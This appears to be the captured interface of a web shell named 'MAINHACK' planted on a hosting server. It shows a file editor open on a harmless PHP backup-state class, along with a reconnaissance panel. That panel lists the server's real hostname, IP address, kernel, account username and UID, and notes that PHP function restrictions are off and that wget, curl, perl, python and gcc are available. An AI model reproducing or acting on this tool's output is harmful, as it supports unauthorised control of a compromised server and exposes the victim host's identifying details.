[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SGDBState.php
<?php require_once(dirname(__FILE__).'/SGState.php'); class SGDBState extends SGState { private $progressCursor = 0; private $cursor = 0; private $numberOfEntries = 0; private $lineSize = 0; private $backedUpTables = array(); private $tablesToBackup = array(); function __construct() { $this->type = SG_STATE_TYPE_DB; } public function setBackedUpTables($backedUpTables) { $this->backedUpTables = $backedUpTables; } public function getBackedUpTables() { return $this->backedUpTables; } public function getTablesToBackup(){ return $this->tablesToBackup; } public function setTablesToBackup($tablesToBackup){ $this->tablesToBackup = $tablesToBackup; } public function setLineSize($lineSize) { $this->lineSize = $lineSize; } public function getLineSize() { return $this->lineSize; } public function setNumberOfEntries($numberOfEntries) { $this->numberOfEntries = $numberOfEntries; } public function getNumberOfEntries() { return $this->numberOfEntries; } public function setCursor($cursor) { $this->cursor = $cursor; } public function getCursor() { return $this->cursor; } public function setProgressCursor($progressCursor) { $this->progressCursor = $progressCursor; } public function getProgressCursor() { return $this->progressCursor; } public function init($stateJson) { $this->lineSize = $stateJson['lineSize']; $this->numberOfEntries = $stateJson['numberOfEntries']; $this->inprogress = $stateJson['inprogress']; $this->cursor = $stateJson['cursor']; $this->progressCursor = $stateJson['progressCursor']; $this->offset = $stateJson['offset']; $this->action = $stateJson['action']; $this->actionId = $stateJson['actionId']; $this->actionStartTs = $stateJson['actionStartTs']; $this->backupFileName = $stateJson['backupFileName']; $this->backupFilePath = $stateJson['backupFilePath']; $this->progress = $stateJson['progress']; $this->warningsFound = $stateJson['warningsFound']; $this->pendingStorageUploads = $stateJson['pendingStorageUploads']; $this->backedUpTables = $stateJson['backedUpTables']; $this->tablesToBackup = $stateJson['tablesToBackup']; return $this; } public function save() { file_put_contents(SG_BACKUP_DIRECTORY.SG_STATE_FILE_NAME, json_encode(array( 'lineSize' => $this->lineSize, 'numberOfEntries' => $this->numberOfEntries, 'inprogress' => $this->inprogress, 'cursor' => $this->cursor, 'progressCursor' => $this->progressCursor, 'offset' => $this->offset, 'type' => $this->type, 'token' => $this->token, 'action' => $this->action, 'actionId' => $this->actionId, 'actionStartTs' => $this->actionStartTs, 'backupFileName' => $this->backupFileName, 'backupFilePath' => $this->backupFilePath, 'progress' => $this->progress, 'warningsFound' => $this->warningsFound, 'pendingStorageUploads' => $this->pendingStorageUploads, 'backedUpTables' => $this->backedUpTables, 'tablesToBackup' => $this->tablesToBackup ))); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.52 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830